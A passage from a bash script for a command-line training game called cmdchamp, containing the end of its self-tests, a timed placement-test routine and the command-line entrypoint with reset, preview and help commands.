      local _mid="${_dv#*|}"; _sc[$_dk]="$((_dt - 1))|${_mid%|*}|$_now"
    elif ((_dt == 1 && _age > _DECAY_T1)); then
      local _mid="${_dv#*|}"; _sc[$_dk]="0|${_mid%|*}|$_now"
    fi
  done
  _hash "decay test q1"; _assert "decay tier2->1" "${_sc[$REPLY]%%|*}" "1"
  _hash "decay test q2"; _assert "decay tier1->0" "${_sc[$REPLY]%%|*}" "0"
  DATA="$_save_data"
  rm -rf "$_test_data"

  printf '%s\n' "${B}=== profile ===${N}"
  _test_data=$(mktemp -d)
  _save_data="$DATA"; DATA="$_test_data"
  PLAYER_NAME="testplayer" BOSS_BEATEN=15 BEST_CHALLENGE=42 DISKS_FOUND="vimquit,konami" SC_DONE="1,2,3" LAST_DECAY=12345 PLACED_THROUGH=5
  _save_profile() {
    printf 'PLAYER_NAME=%s\nBOSS_BEATEN=%d\nBEST_CHALLENGE=%d\nDISKS_FOUND=%s\nSC_DONE=%s\nLAST_DECAY=%d\nPLACED_THROUGH=%d\nPROFILE_VER=%d\n' \
      "$PLAYER_NAME" "$BOSS_BEATEN" "$BEST_CHALLENGE" "$DISKS_FOUND" "$SC_DONE" "$LAST_DECAY" "$PLACED_THROUGH" "$_PROFILE_VER" > "$DATA/profile.tmp"
    mv "$DATA/profile.tmp" "$DATA/profile"
  }
  _save_profile
  PLAYER_NAME="" BOSS_BEATEN=0 BEST_CHALLENGE=0 DISKS_FOUND="" SC_DONE="" LAST_DECAY=0 PLACED_THROUGH=0
  while IFS='=' read -r key val; do
    case "$key" in
      PLAYER_NAME) PLAYER_NAME="$val";; BOSS_BEATEN) BOSS_BEATEN="$val";;
      BEST_CHALLENGE) BEST_CHALLENGE="$val";;
      DISKS_FOUND) DISKS_FOUND="$val";; SC_DONE) SC_DONE="$val";; LAST_DECAY) LAST_DECAY="$val";;
      PLACED_THROUGH) PLACED_THROUGH="$val";;
    esac
  done < "$DATA/profile"
  _assert "profile name"       "$PLAYER_NAME"  "testplayer"
  _assert "profile boss"       "$BOSS_BEATEN"  "15"
  _assert "profile challenge"  "$BEST_CHALLENGE" "42"
  _assert "profile disks"      "$DISKS_FOUND"  "vimquit,konami"
  _assert "profile sc_done"    "$SC_DONE"      "1,2,3"
  _assert "profile last_decay" "$LAST_DECAY"   "12345"
  _assert "profile placed"     "$PLACED_THROUGH" "5"
  DATA="$_save_data"
  rm -rf "$_test_data"

  printf '%s\n' "${B}=== gen_level smoke ===${N}"
  local _lv _lines _empty_ok=0
  for ((_lv=1; _lv<=30; _lv++)); do
    local _test_q=(); gen_level${_lv} _test_q; _lines=${#_test_q[@]}
    if ((_lines < 5)); then
      ((_fail++)); printf '  FAIL: gen_level%d only produced %d questions\n' "$_lv" "$_lines"
    else
      ((_pass++))
    fi
  done

  printf '\n%s%s%d passed%s, ' "$B" "$G" "$_pass" "$N"
  ((_fail)) && printf '%s%s%d failed%s\n' "$B" "$R" "$_fail" "$N" || printf '%s0 failed%s\n' "$D" "$N"
  return $((_fail > 0))
}

# ═══ PLACEMENT ═══
place() {
  printf '%s\e[2J\e[H%s\n%s\n%s\n\n%s' "$_SY" "${M}${B}═══ PLACEMENT TEST ═══${N}" "${D}2 questions per level, 30s each, no manpages${N}" "${D}Miss one → that's your starting level${N}" "$_SN"
  read -rsp "${D}Press Enter to start...${N}"; echo

  _session_init
  _mode_init place
  local lv qi_ok
  for ((lv=1; lv<=MAX_LEVEL; lv++)); do
    qi_ok=0
    for ((qi=1; qi<=2; qi++)); do
      _pick_q "$lv" || break 2
      local prompt=$_qprompt ans=$_qans
      _REDRAW_HDR() {
        local _t=30
        if ((${_rl_deadline:-0})); then _rl_rem; _t=$REPLY; fi
        printf '%s\e[H%s  %s  %s\e[K\n\e[K\n%s\e[K\n\e[K\n\e[J%s' "$_SY" "${U}Level ${lv}${N}" "${U}Q${qi}/2${N}" "${W}${_t}s${N}" "${C}${prompt}${N}" "$_SN"
      }
      printf '\e[2J'; _REDRAW_HDR
      if _read_line 0 0 30; then
        ((_QUIT)) && break 2
        if check "$input" "$_qanswers"; then
          printf '%s\n' "${G}${B}+${N}"; ((qi_ok++)); _pause
          continue
        fi
      else
        ((_QUIT)) && break 2
      fi
      # Wrong or timed out
      printf '\n%s  %s %s\n' "${R}${B}✗${N}" "${D}expected:${N}" "${Y}${ans}${N}"
      _pause; break
    done
    ((qi_ok < 2)) && break
  done
  # Set placement
  local placed=$((lv - 1))
  ((qi_ok >= 2 && lv > MAX_LEVEL)) && placed=$MAX_LEVEL
  ((placed > BOSS_BEATEN)) && BOSS_BEATEN=$placed
  ((placed > 0)) && PLACED_THROUGH=$placed
  _save_profile
  LVL=$((placed >= MAX_LEVEL ? MAX_LEVEL : placed + 1)); QI=0; save
  printf '%s\e[2J\e[H%s\n' "$_SY" "${G}${B}═══ PLACEMENT COMPLETE ═══${N}"
  if ((placed == 0)); then
    printf '%s\n' "Starting from ${U}Level 1${N}"
  elif ((placed >= MAX_LEVEL)); then
    printf '%s\n' "${G}${B}Perfect!${N} All levels cleared — post-ROOT modes unlocked"
  else
    printf '%s\n' "Placed at ${U}Level $((placed + 1))${N}"
  fi
  printf '%s' "$_SN"
  _sflush_if_dirty
  echo
  _pause
}

# ═══ CLI ENTRYPOINT ═══
_args=()
for _a in "$@"; do [[ "$_a" == "--no-sandbox" ]] && SANDBOX_MODE=0 || _args+=("$_a"); done
set -- "${_args[@]+"${_args[@]}"}"

case "${1:-}" in
  test|selftest) _selftest;;
  r|reset) rm -f "$DATA"/*.json "$DATA/scores" "$DATA/scores.lock" "$DATA/profile"; rm -rf "$DATA/sandbox" "$DATA/sandbox.pristine" 2>/dev/null; echo "Reset.";;
  preview)
    # Dev-only: dump all visual content for review
    [[ "${CMDCHAMP_DEV:-}" != "1" ]] && { echo "Unknown command. Try: cmdchamp help"; exit 1; }
    _preview() {
    PLAYER_NAME="${PLAYER_NAME:-preview}" BOSS_BEATEN=30

    printf '%s\n' "${B}═══ INTRO SCREEN ═══${N}"
    _intro nopause

    printf '\n%s\n' "${B}═══ LEVELS & BOSSES ═══${N}"
    for ((lv=1; lv<=MAX_LEVEL; lv++)); do
      printf '\n  %s %2d: %-22s  %sBoss: %-16s%s  %s\n' "${U}Level${N}" "$lv" "${LEVEL_NAMES[$lv]:-}" "${M}" "${BOSS_NAMES[$lv]:-}" "${N}" "${D}\"${BOSS_FLAVOR[$lv]:-}\"${N}"
      local _pq=(); gen_level$lv _pq
      for ((_si=0; _si<3 && _si<${#_pq[@]}; _si++)); do
        _qparse "${_pq[$_si]}"
        printf '    %s → %s\n' "${D}$_qprompt${N}" "${G}$_qans${N}"
      done
    done

    printf '\n\n%s\n' "${B}═══ BOSS SPLASH (sample: Level 15) ═══${N}"
    local _sboss="${BOSS_NAMES[15]}" _sflavor="${BOSS_FLAVOR[15]}"
    local s; printf -v s '%*s' $(( (80 - 12) / 2 )) ''
    printf '\n%s%s\n\n' "$s" "${M}${B}═══ BOSS ═══${N}"
    printf -v s '%*s' $(( (80 - ${#_sboss}) / 2 )) ''
    printf '%s%s\n\n' "$s" "${M}${B}${_sboss}${N}"
    printf -v s '%*s' $(( (80 - ${#_sflavor} - 2) / 2 )) ''
    printf '%s%s\n' "$s" "${D}\"${_sflavor}\"${N}"

    printf '\n\n%s\n' "${B}═══ SCENARIOS ═══${N}"
    for ((si=1; si<=SC_TOTAL; si++)); do
      printf '\n  %s %d: %-22s  %s(unlocks at boss %d)%s\n' "${M}${B}Scenario${N}" "$si" "${SC_NAMES[$si]:-}" "${D}" "${SC_UNLOCK[$si]:-0}" "${N}"
      printf '    %s\n' "${D}${SC_FLAVOR[$si]:-}${N}"
    done

    printf '\n\n%s\n' "${B}═══ VICTORY SCREEN ═══${N}"
    _victory nopause
    }; _preview;;
  h|help|-h|--help)
    cat <<EOF
${B}cmdchamp${N} - CLI trainer
${D}30 levels, spaced repetition, sandbox execution${N}

Usage: cmdchamp [--no-sandbox] [command]

Run with no arguments for the game menu.

Options:
  --no-sandbox  Disable sandbox (text-match only)

Commands:
  r|reset       Reset all progress
  test          Run self-tests
  h|help        Show this help
EOF
    ;;
  "") _tty; _load_profile; _apply_opts; _main_menu;;
  *) echo "Usage: cmdchamp [--no-sandbox] [reset|test|help]"; echo "Run with no arguments for the game menu."; exit 1;;
esac